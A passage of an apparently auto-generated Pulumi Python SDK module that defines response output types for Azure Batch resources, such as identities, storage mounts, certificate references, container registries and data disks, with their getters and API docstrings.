'BatchPoolIdentityResponseUserAssignedIdentities',
'CIFSMountConfigurationResponse',
'CertificateReferenceResponse',
'CloudServiceConfigurationResponse',
'ContainerConfigurationResponse',
'ContainerRegistryResponse',
'DataDiskResponse',
'DeleteCertificateErrorResponse',
'DeploymentConfigurationResponse',
'DiskEncryptionConfigurationResponse',
'EncryptionPropertiesResponse',
'EnvironmentSettingResponse',
'FixedScaleSettingsResponse',
'ImageReferenceResponse',
'InboundNatPoolResponse',
'KeyVaultPropertiesResponse',
'KeyVaultReferenceResponse',
'LinuxUserConfigurationResponse',
'MetadataItemResponse',
'MountConfigurationResponse',
'NFSMountConfigurationResponse',
'NetworkConfigurationResponse',
'NetworkSecurityGroupRuleResponse',
'NodePlacementConfigurationResponse',
'PoolEndpointConfigurationResponse',
'PrivateEndpointConnectionResponse',
'PrivateEndpointResponse',
'PrivateLinkServiceConnectionStateResponse',
'PublicIPAddressConfigurationResponse',
'ResizeErrorResponse',
'ResizeOperationStatusResponse',
'ResourceFileResponse',
'ScaleSettingsResponse',
'StartTaskResponse',
'TaskContainerSettingsResponse',
'TaskSchedulingPolicyResponse',
'UserAccountResponse',
'UserIdentityResponse',
'VMExtensionResponse',
'VirtualMachineConfigurationResponse',
'VirtualMachineFamilyCoreQuotaResponse',
'WindowsConfigurationResponse',
'WindowsUserConfigurationResponse',
]
@pulumi.output_type
class ApplicationPackageReferenceResponse(dict):
def __init__(__self__, *,
id: str,
version: Optional[str] = None):
"""
:param str version: If this is omitted, and no default version is specified for this application, the request fails with the error code InvalidApplicationPackageReferences. If you are calling the REST API directly, the HTTP status code is 409.
"""
pulumi.set(__self__, "id", id)
if version is not None:
pulumi.set(__self__, "version", version)
@property
@pulumi.getter
def id(self) -> str:
return pulumi.get(self, "id")
@property
@pulumi.getter
def version(self) -> Optional[str]:
"""
If this is omitted, and no default version is specified for this application, the request fails with the error code InvalidApplicationPackageReferences. If you are calling the REST API directly, the HTTP status code is 409.
"""
return pulumi.get(self, "version")
@pulumi.output_type
class AutoScaleRunErrorResponse(dict):
def __init__(__self__, *,
code: str,
message: str,
details: Optional[Sequence['outputs.AutoScaleRunErrorResponse']] = None):
"""
:param str code: An identifier for the error. Codes are invariant and are intended to be consumed programmatically.
:param str message: A message describing the error, intended to be suitable for display in a user interface.
"""
pulumi.set(__self__, "code", code)
pulumi.set(__self__, "message", message)
if details is not None:
pulumi.set(__self__, "details", details)
@property
@pulumi.getter
def code(self) -> str:
"""
An identifier for the error. Codes are invariant and are intended to be consumed programmatically.
"""
return pulumi.get(self, "code")
@property
@pulumi.getter
def message(self) -> str:
"""
A message describing the error, intended to be suitable for display in a user interface.
"""
return pulumi.get(self, "message")
@property
@pulumi.getter
def details(self) -> Optional[Sequence['outputs.AutoScaleRunErrorResponse']]:
return pulumi.get(self, "details")
@pulumi.output_type
class AutoScaleRunResponse(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "evaluationTime":
suggest = "evaluation_time"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in AutoScaleRunResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
AutoScaleRunResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
AutoScaleRunResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
evaluation_time: str,
error: Optional['outputs.AutoScaleRunErrorResponse'] = None,
results: Optional[str] = None):
"""
:param str results: Each variable value is returned in the form $variable=value, and variables are separated by semicolons.
"""
pulumi.set(__self__, "evaluation_time", evaluation_time)
if error is not None:
pulumi.set(__self__, "error", error)
if results is not None:
pulumi.set(__self__, "results", results)
@property
@pulumi.getter(name="evaluationTime")
def evaluation_time(self) -> str:
return pulumi.get(self, "evaluation_time")
@property
@pulumi.getter
def error(self) -> Optional['outputs.AutoScaleRunErrorResponse']:
return pulumi.get(self, "error")
@property
@pulumi.getter
def results(self) -> Optional[str]:
"""
Each variable value is returned in the form $variable=value, and variables are separated by semicolons.
"""
return pulumi.get(self, "results")
@pulumi.output_type
class AutoScaleSettingsResponse(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "evaluationInterval":
suggest = "evaluation_interval"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in AutoScaleSettingsResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
AutoScaleSettingsResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
AutoScaleSettingsResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
formula: str,
evaluation_interval: Optional[str] = None):
"""
:param str evaluation_interval: If omitted, the default value is 15 minutes (PT15M).
"""
pulumi.set(__self__, "formula", formula)
if evaluation_interval is not None:
pulumi.set(__self__, "evaluation_interval", evaluation_interval)
@property
@pulumi.getter
def formula(self) -> str:
return pulumi.get(self, "formula")
@property
@pulumi.getter(name="evaluationInterval")
def evaluation_interval(self) -> Optional[str]:
"""
If omitted, the default value is 15 minutes (PT15M).
"""
return pulumi.get(self, "evaluation_interval")
@pulumi.output_type
class AutoStoragePropertiesResponse(dict):
"""
Contains information about the auto-storage account associated with a Batch account.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "lastKeySync":
suggest = "last_key_sync"
elif key == "storageAccountId":
suggest = "storage_account_id"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in AutoStoragePropertiesResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
AutoStoragePropertiesResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
AutoStoragePropertiesResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
last_key_sync: str,
storage_account_id: str):
"""
Contains information about the auto-storage account associated with a Batch account.
:param str last_key_sync: The UTC time at which storage keys were last synchronized with the Batch account.
:param str storage_account_id: The resource ID of the storage account to be used for auto-storage account.
"""
pulumi.set(__self__, "last_key_sync", last_key_sync)
pulumi.set(__self__, "storage_account_id", storage_account_id)
@property
@pulumi.getter(name="lastKeySync")
def last_key_sync(self) -> str:
"""
The UTC time at which storage keys were last synchronized with the Batch account.
"""
return pulumi.get(self, "last_key_sync")
@property
@pulumi.getter(name="storageAccountId")
def storage_account_id(self) -> str:
"""
The resource ID of the storage account to be used for auto-storage account.
"""
return pulumi.get(self, "storage_account_id")
@pulumi.output_type
class AutoUserSpecificationResponse(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "elevationLevel":
suggest = "elevation_level"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in AutoUserSpecificationResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
AutoUserSpecificationResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
AutoUserSpecificationResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
elevation_level: Optional[str] = None,
scope: Optional[str] = None):
"""
:param str elevation_level: The default value is nonAdmin.
:param str scope: The default value is Pool. If the pool is running Windows a value of Task should be specified if stricter isolation between tasks is required. For example, if the task mutates the registry in a way which could impact other tasks, or if certificates have been specified on the pool which should not be accessible by normal tasks but should be accessible by start tasks.
"""
if elevation_level is not None:
pulumi.set(__self__, "elevation_level", elevation_level)
if scope is not None:
pulumi.set(__self__, "scope", scope)
@property
@pulumi.getter(name="elevationLevel")
def elevation_level(self) -> Optional[str]:
"""
The default value is nonAdmin.
"""
return pulumi.get(self, "elevation_level")
@property
@pulumi.getter
def scope(self) -> Optional[str]:
"""
The default value is Pool. If the pool is running Windows a value of Task should be specified if stricter isolation between tasks is required. For example, if the task mutates the registry in a way which could impact other tasks, or if certificates have been specified on the pool which should not be accessible by normal tasks but should be accessible by start tasks.
"""
return pulumi.get(self, "scope")
@pulumi.output_type
class AzureBlobFileSystemConfigurationResponse(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "accountName":
suggest = "account_name"
elif key == "containerName":
suggest = "container_name"
elif key == "relativeMountPath":
suggest = "relative_mount_path"
elif key == "accountKey":
suggest = "account_key"
elif key == "blobfuseOptions":
suggest = "blobfuse_options"
elif key == "sasKey":
suggest = "sas_key"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in AzureBlobFileSystemConfigurationResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
AzureBlobFileSystemConfigurationResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
AzureBlobFileSystemConfigurationResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
account_name: str,
container_name: str,
relative_mount_path: str,
account_key: Optional[str] = None,
blobfuse_options: Optional[str] = None,
sas_key: Optional[str] = None):
"""
:param str relative_mount_path: All file systems are mounted relative to the Batch mounts directory, accessible via the AZ_BATCH_NODE_MOUNTS_DIR environment variable.
:param str account_key: This property is mutually exclusive with sasKey and one must be specified.
:param str blobfuse_options: These are 'net use' options in Windows and 'mount' options in Linux.
:param str sas_key: This property is mutually exclusive with accountKey and one must be specified.
"""
pulumi.set(__self__, "account_name", account_name)
pulumi.set(__self__, "container_name", container_name)
pulumi.set(__self__, "relative_mount_path", relative_mount_path)
if account_key is not None:
pulumi.set(__self__, "account_key", account_key)
if blobfuse_options is not None:
pulumi.set(__self__, "blobfuse_options", blobfuse_options)
if sas_key is not None:
pulumi.set(__self__, "sas_key", sas_key)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> str:
return pulumi.get(self, "account_name")
@property
@pulumi.getter(name="containerName")
def container_name(self) -> str:
return pulumi.get(self, "container_name")
@property
@pulumi.getter(name="relativeMountPath")
def relative_mount_path(self) -> str:
"""
All file systems are mounted relative to the Batch mounts directory, accessible via the AZ_BATCH_NODE_MOUNTS_DIR environment variable.
"""
return pulumi.get(self, "relative_mount_path")
@property
@pulumi.getter(name="accountKey")
def account_key(self) -> Optional[str]:
"""
This property is mutually exclusive with sasKey and one must be specified.
"""
return pulumi.get(self, "account_key")
@property
@pulumi.getter(name="blobfuseOptions")
def blobfuse_options(self) -> Optional[str]:
"""
These are 'net use' options in Windows and 'mount' options in Linux.
"""
return pulumi.get(self, "blobfuse_options")
@property
@pulumi.getter(name="sasKey")
def sas_key(self) -> Optional[str]:
"""
This property is mutually exclusive with accountKey and one must be specified.
"""
return pulumi.get(self, "sas_key")
@pulumi.output_type
class AzureFileShareConfigurationResponse(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "accountKey":
suggest = "account_key"
elif key == "accountName":
suggest = "account_name"
elif key == "azureFileUrl":
suggest = "azure_file_url"
elif key == "relativeMountPath":
suggest = "relative_mount_path"
elif key == "mountOptions":
suggest = "mount_options"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in AzureFileShareConfigurationResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
AzureFileShareConfigurationResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
AzureFileShareConfigurationResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
account_key: str,
account_name: str,
azure_file_url: str,
relative_mount_path: str,
mount_options: Optional[str] = None):
"""
:param str azure_file_url: This is of the form 'https://{account}.file.core.windows.net/'.
:param str relative_mount_path: All file systems are mounted relative to the Batch mounts directory, accessible via the AZ_BATCH_NODE_MOUNTS_DIR environment variable.
:param str mount_options: These are 'net use' options in Windows and 'mount' options in Linux.
"""
pulumi.set(__self__, "account_key", account_key)
pulumi.set(__self__, "account_name", account_name)
pulumi.set(__self__, "azure_file_url", azure_file_url)
pulumi.set(__self__, "relative_mount_path", relative_mount_path)
if mount_options is not None:
pulumi.set(__self__, "mount_options", mount_options)
@property
@pulumi.getter(name="accountKey")
def account_key(self) -> str:
return pulumi.get(self, "account_key")
@property
@pulumi.getter(name="accountName")
def account_name(self) -> str:
return pulumi.get(self, "account_name")
@property
@pulumi.getter(name="azureFileUrl")
def azure_file_url(self) -> str:
"""
This is of the form 'https://{account}.file.core.windows.net/'.
"""
return pulumi.get(self, "azure_file_url")
@property
@pulumi.getter(name="relativeMountPath")
def relative_mount_path(self) -> str:
"""
All file systems are mounted relative to the Batch mounts directory, accessible via the AZ_BATCH_NODE_MOUNTS_DIR environment variable.
"""
return pulumi.get(self, "relative_mount_path")
@property
@pulumi.getter(name="mountOptions")
def mount_options(self) -> Optional[str]:
"""
These are 'net use' options in Windows and 'mount' options in Linux.
"""
return pulumi.get(self, "mount_options")
@pulumi.output_type
class BatchAccountIdentityResponse(dict):
"""
The identity of the Batch account, if configured. This is only used when the user specifies 'Microsoft.KeyVault' as their Batch account encryption configuration.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "principalId":
suggest = "principal_id"
elif key == "tenantId":
suggest = "tenant_id"
elif key == "userAssignedIdentities":
suggest = "user_assigned_identities"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in BatchAccountIdentityResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
BatchAccountIdentityResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
BatchAccountIdentityResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
principal_id: str,
tenant_id: str,
type: str,
user_assigned_identities: Optional[Mapping[str, 'outputs.BatchAccountIdentityResponseUserAssignedIdentities']] = None):
"""
The identity of the Batch account, if configured. This is only used when the user specifies 'Microsoft.KeyVault' as their Batch account encryption configuration.
:param str principal_id: The principal id of the Batch account. This property will only be provided for a system assigned identity.
:param str tenant_id: The tenant id associated with the Batch account. This property will only be provided for a system assigned identity.
:param str type: The type of identity used for the Batch account.
:param Mapping[str, 'BatchAccountIdentityResponseUserAssignedIdentities'] user_assigned_identities: The list of user identities associated with the Batch account. The user identity dictionary key references will be ARM resource ids in the form: '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ManagedIdentity/userAssignedIdentities/{identityName}'.
"""
pulumi.set(__self__, "principal_id", principal_id)
pulumi.set(__self__, "tenant_id", tenant_id)
pulumi.set(__self__, "type", type)
if user_assigned_identities is not None:
pulumi.set(__self__, "user_assigned_identities", user_assigned_identities)
@property
@pulumi.getter(name="principalId")
def principal_id(self) -> str:
"""
The principal id of the Batch account. This property will only be provided for a system assigned identity.
"""
return pulumi.get(self, "principal_id")
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> str:
"""
The tenant id associated with the Batch account. This property will only be provided for a system assigned identity.
"""
return pulumi.get(self, "tenant_id")
@property
@pulumi.getter
def type(self) -> str:
"""
The type of identity used for the Batch account.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="userAssignedIdentities")
def user_assigned_identities(self) -> Optional[Mapping[str, 'outputs.BatchAccountIdentityResponseUserAssignedIdentities']]:
"""
The list of user identities associated with the Batch account. The user identity dictionary key references will be ARM resource ids in the form: '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ManagedIdentity/userAssignedIdentities/{identityName}'.
"""
return pulumi.get(self, "user_assigned_identities")
@pulumi.output_type
class BatchAccountIdentityResponseUserAssignedIdentities(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "clientId":
suggest = "client_id"
elif key == "principalId":
suggest = "principal_id"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in BatchAccountIdentityResponseUserAssignedIdentities. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
BatchAccountIdentityResponseUserAssignedIdentities.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
BatchAccountIdentityResponseUserAssignedIdentities.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
client_id: str,
principal_id: str):
"""
:param str client_id: The client id of user assigned identity.
:param str principal_id: The principal id of user assigned identity.
"""
pulumi.set(__self__, "client_id", client_id)
pulumi.set(__self__, "principal_id", principal_id)
@property
@pulumi.getter(name="clientId")
def client_id(self) -> str:
"""
The client id of user assigned identity.
"""
return pulumi.get(self, "client_id")
@property
@pulumi.getter(name="principalId")
def principal_id(self) -> str:
"""
The principal id of user assigned identity.
"""
return pulumi.get(self, "principal_id")
@pulumi.output_type
class BatchPoolIdentityResponse(dict):
"""
The identity of the Batch pool, if configured. If the pool identity is updated during update an existing pool, only the new vms which are created after the pool shrinks to 0 will have the updated identities
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "userAssignedIdentities":
suggest = "user_assigned_identities"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in BatchPoolIdentityResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
BatchPoolIdentityResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
BatchPoolIdentityResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
type: str,
user_assigned_identities: Optional[Mapping[str, 'outputs.BatchPoolIdentityResponseUserAssignedIdentities']] = None):
"""
The identity of the Batch pool, if configured. If the pool identity is updated during update an existing pool, only the new vms which are created after the pool shrinks to 0 will have the updated identities
:param str type: The type of identity used for the Batch Pool.
:param Mapping[str, 'BatchPoolIdentityResponseUserAssignedIdentities'] user_assigned_identities: The list of user identities associated with the Batch pool. The user identity dictionary key references will be ARM resource ids in the form: '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ManagedIdentity/userAssignedIdentities/{identityName}'.
"""
pulumi.set(__self__, "type", type)
if user_assigned_identities is not None:
pulumi.set(__self__, "user_assigned_identities", user_assigned_identities)
@property
@pulumi.getter
def type(self) -> str:
"""
The type of identity used for the Batch Pool.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="userAssignedIdentities")
def user_assigned_identities(self) -> Optional[Mapping[str, 'outputs.BatchPoolIdentityResponseUserAssignedIdentities']]:
"""
The list of user identities associated with the Batch pool. The user identity dictionary key references will be ARM resource ids in the form: '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ManagedIdentity/userAssignedIdentities/{identityName}'.
"""
return pulumi.get(self, "user_assigned_identities")
@pulumi.output_type
class BatchPoolIdentityResponseUserAssignedIdentities(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "clientId":
suggest = "client_id"
elif key == "principalId":
suggest = "principal_id"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in BatchPoolIdentityResponseUserAssignedIdentities. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
BatchPoolIdentityResponseUserAssignedIdentities.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
BatchPoolIdentityResponseUserAssignedIdentities.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
client_id: str,
principal_id: str):
"""
:param str client_id: The client id of user assigned identity.
:param str principal_id: The principal id of user assigned identity.
"""
pulumi.set(__self__, "client_id", client_id)
pulumi.set(__self__, "principal_id", principal_id)
@property
@pulumi.getter(name="clientId")
def client_id(self) -> str:
"""
The client id of user assigned identity.
"""
return pulumi.get(self, "client_id")
@property
@pulumi.getter(name="principalId")
def principal_id(self) -> str:
"""
The principal id of user assigned identity.
"""
return pulumi.get(self, "principal_id")
@pulumi.output_type
class CIFSMountConfigurationResponse(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "relativeMountPath":
suggest = "relative_mount_path"
elif key == "mountOptions":
suggest = "mount_options"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in CIFSMountConfigurationResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
CIFSMountConfigurationResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
CIFSMountConfigurationResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
password: str,
relative_mount_path: str,
source: str,
username: str,
mount_options: Optional[str] = None):
"""
:param str relative_mount_path: All file systems are mounted relative to the Batch mounts directory, accessible via the AZ_BATCH_NODE_MOUNTS_DIR environment variable.
:param str mount_options: These are 'net use' options in Windows and 'mount' options in Linux.
"""
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "relative_mount_path", relative_mount_path)
pulumi.set(__self__, "source", source)
pulumi.set(__self__, "username", username)
if mount_options is not None:
pulumi.set(__self__, "mount_options", mount_options)
@property
@pulumi.getter
def password(self) -> str:
return pulumi.get(self, "password")
@property
@pulumi.getter(name="relativeMountPath")
def relative_mount_path(self) -> str:
"""
All file systems are mounted relative to the Batch mounts directory, accessible via the AZ_BATCH_NODE_MOUNTS_DIR environment variable.
"""
return pulumi.get(self, "relative_mount_path")
@property
@pulumi.getter
def source(self) -> str:
return pulumi.get(self, "source")
@property
@pulumi.getter
def username(self) -> str:
return pulumi.get(self, "username")
@property
@pulumi.getter(name="mountOptions")
def mount_options(self) -> Optional[str]:
"""
These are 'net use' options in Windows and 'mount' options in Linux.
"""
return pulumi.get(self, "mount_options")
@pulumi.output_type
class CertificateReferenceResponse(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "storeLocation":
suggest = "store_location"
elif key == "storeName":
suggest = "store_name"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in CertificateReferenceResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
CertificateReferenceResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
CertificateReferenceResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
id: str,
store_location: Optional[str] = None,
store_name: Optional[str] = None,
visibility: Optional[Sequence[str]] = None):
"""
:param str store_location: The default value is currentUser. This property is applicable only for pools configured with Windows nodes (that is, created with cloudServiceConfiguration, or with virtualMachineConfiguration using a Windows image reference). For Linux compute nodes, the certificates are stored in a directory inside the task working directory and an environment variable AZ_BATCH_CERTIFICATES_DIR is supplied to the task to query for this location. For certificates with visibility of 'remoteUser', a 'certs' directory is created in the user's home directory (e.g., /home/{user-name}/certs) and certificates are placed in that directory.
:param str store_name: This property is applicable only for pools configured with Windows nodes (that is, created with cloudServiceConfiguration, or with virtualMachineConfiguration using a Windows image reference). Common store names include: My, Root, CA, Trust, Disallowed, TrustedPeople, TrustedPublisher, AuthRoot, AddressBook, but any custom store name can also be used. The default value is My.
"""
pulumi.set(__self__, "id", id)
if store_location is not None:
pulumi.set(__self__, "store_location", store_location)
if store_name is not None:
pulumi.set(__self__, "store_name", store_name)
if visibility is not None:
pulumi.set(__self__, "visibility", visibility)
@property
@pulumi.getter
def id(self) -> str:
return pulumi.get(self, "id")
@property
@pulumi.getter(name="storeLocation")
def store_location(self) -> Optional[str]:
"""
The default value is currentUser. This property is applicable only for pools configured with Windows nodes (that is, created with cloudServiceConfiguration, or with virtualMachineConfiguration using a Windows image reference). For Linux compute nodes, the certificates are stored in a directory inside the task working directory and an environment variable AZ_BATCH_CERTIFICATES_DIR is supplied to the task to query for this location. For certificates with visibility of 'remoteUser', a 'certs' directory is created in the user's home directory (e.g., /home/{user-name}/certs) and certificates are placed in that directory.
"""
return pulumi.get(self, "store_location")
@property
@pulumi.getter(name="storeName")
def store_name(self) -> Optional[str]:
"""
This property is applicable only for pools configured with Windows nodes (that is, created with cloudServiceConfiguration, or with virtualMachineConfiguration using a Windows image reference). Common store names include: My, Root, CA, Trust, Disallowed, TrustedPeople, TrustedPublisher, AuthRoot, AddressBook, but any custom store name can also be used. The default value is My.
"""
return pulumi.get(self, "store_name")
@property
@pulumi.getter
def visibility(self) -> Optional[Sequence[str]]:
return pulumi.get(self, "visibility")
@pulumi.output_type
class CloudServiceConfigurationResponse(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "osFamily":
suggest = "os_family"
elif key == "osVersion":
suggest = "os_version"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in CloudServiceConfigurationResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
CloudServiceConfigurationResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
CloudServiceConfigurationResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
os_family: str,
os_version: Optional[str] = None):
"""
:param str os_family: Possible values are: 2 - OS Family 2, equivalent to Windows Server 2008 R2 SP1. 3 - OS Family 3, equivalent to Windows Server 2012. 4 - OS Family 4, equivalent to Windows Server 2012 R2. 5 - OS Family 5, equivalent to Windows Server 2016. 6 - OS Family 6, equivalent to Windows Server 2019. For more information, see Azure Guest OS Releases (https://azure.microsoft.com/documentation/articles/cloud-services-guestos-update-matrix/#releases).
:param str os_version: The default value is * which specifies the latest operating system version for the specified OS family.
"""
pulumi.set(__self__, "os_family", os_family)
if os_version is not None:
pulumi.set(__self__, "os_version", os_version)
@property
@pulumi.getter(name="osFamily")
def os_family(self) -> str:
"""
Possible values are: 2 - OS Family 2, equivalent to Windows Server 2008 R2 SP1. 3 - OS Family 3, equivalent to Windows Server 2012. 4 - OS Family 4, equivalent to Windows Server 2012 R2. 5 - OS Family 5, equivalent to Windows Server 2016. 6 - OS Family 6, equivalent to Windows Server 2019. For more information, see Azure Guest OS Releases (https://azure.microsoft.com/documentation/articles/cloud-services-guestos-update-matrix/#releases).
"""
return pulumi.get(self, "os_family")
@property
@pulumi.getter(name="osVersion")
def os_version(self) -> Optional[str]:
"""
The default value is * which specifies the latest operating system version for the specified OS family.
"""
return pulumi.get(self, "os_version")
@pulumi.output_type
class ContainerConfigurationResponse(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "containerImageNames":
suggest = "container_image_names"
elif key == "containerRegistries":
suggest = "container_registries"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ContainerConfigurationResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ContainerConfigurationResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ContainerConfigurationResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
type: str,
container_image_names: Optional[Sequence[str]] = None,
container_registries: Optional[Sequence['outputs.ContainerRegistryResponse']] = None):
"""
:param Sequence[str] container_image_names: This is the full image reference, as would be specified to "docker pull". An image will be sourced from the default Docker registry unless the image is fully qualified with an alternative registry.
:param Sequence['ContainerRegistryResponse'] container_registries: If any images must be downloaded from a private registry which requires credentials, then those credentials must be provided here.
"""
pulumi.set(__self__, "type", type)
if container_image_names is not None:
pulumi.set(__self__, "container_image_names", container_image_names)
if container_registries is not None:
pulumi.set(__self__, "container_registries", container_registries)
@property
@pulumi.getter
def type(self) -> str:
return pulumi.get(self, "type")
@property
@pulumi.getter(name="containerImageNames")
def container_image_names(self) -> Optional[Sequence[str]]:
"""
This is the full image reference, as would be specified to "docker pull". An image will be sourced from the default Docker registry unless the image is fully qualified with an alternative registry.
"""
return pulumi.get(self, "container_image_names")
@property
@pulumi.getter(name="containerRegistries")
def container_registries(self) -> Optional[Sequence['outputs.ContainerRegistryResponse']]:
"""
If any images must be downloaded from a private registry which requires credentials, then those credentials must be provided here.
"""
return pulumi.get(self, "container_registries")
@pulumi.output_type
class ContainerRegistryResponse(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "userName":
suggest = "user_name"
elif key == "registryServer":
suggest = "registry_server"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ContainerRegistryResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ContainerRegistryResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ContainerRegistryResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
password: str,
user_name: str,
registry_server: Optional[str] = None):
"""
:param str registry_server: If omitted, the default is "docker.io".
"""
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "user_name", user_name)
if registry_server is not None:
pulumi.set(__self__, "registry_server", registry_server)
@property
@pulumi.getter
def password(self) -> str:
return pulumi.get(self, "password")
@property
@pulumi.getter(name="userName")
def user_name(self) -> str:
return pulumi.get(self, "user_name")
@property
@pulumi.getter(name="registryServer")
def registry_server(self) -> Optional[str]:
"""
If omitted, the default is "docker.io".
"""
return pulumi.get(self, "registry_server")
@pulumi.output_type
class DataDiskResponse(dict):
"""
Settings which will be used by the data disks associated to Compute Nodes in the Pool. When using attached data disks, you need to mount and format the disks from within a VM to use them.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "diskSizeGB":
suggest = "disk_size_gb"
elif key == "storageAccountType":
suggest = "storage_account_type"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in DataDiskResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
DataDiskResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
DataDiskResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
disk_size_gb: int,
lun: int,
caching: Optional[str] = None,
storage_account_type: Optional[str] = None):
"""
Settings which will be used by the data disks associated to Compute Nodes in the Pool. When using attached data disks, you need to mount and format the disks from within a VM to use them.
:param int lun: The lun is used to uniquely identify each data disk. If attaching multiple disks, each should have a distinct lun. The value must be between 0 and 63, inclusive.
:param str caching: Values are:
none - The caching mode for the disk is not enabled.
readOnly - The caching mode for the disk is read only.
readWrite - The caching mode for the disk is read and write.
The default value for caching is none. For information about the caching options see: https://blogs.msdn.microsoft.com/windowsazurestorage/2012/06/27/exploring-windows-azure-drives-disks-and-images/.
:param str storage_account_type: If omitted, the default is "Standard_LRS". Values are:
Standard_LRS - The data disk should use standard locally redundant storage.
Premium_LRS - The data disk should use premium locally redundant storage.
"""
pulumi.set(__self__, "disk_size_gb", disk_size_gb)
pulumi.set(__self__, "lun", lun)
if caching is not None:
pulumi.set(__self__, "caching", caching)
if storage_account_type is not None:
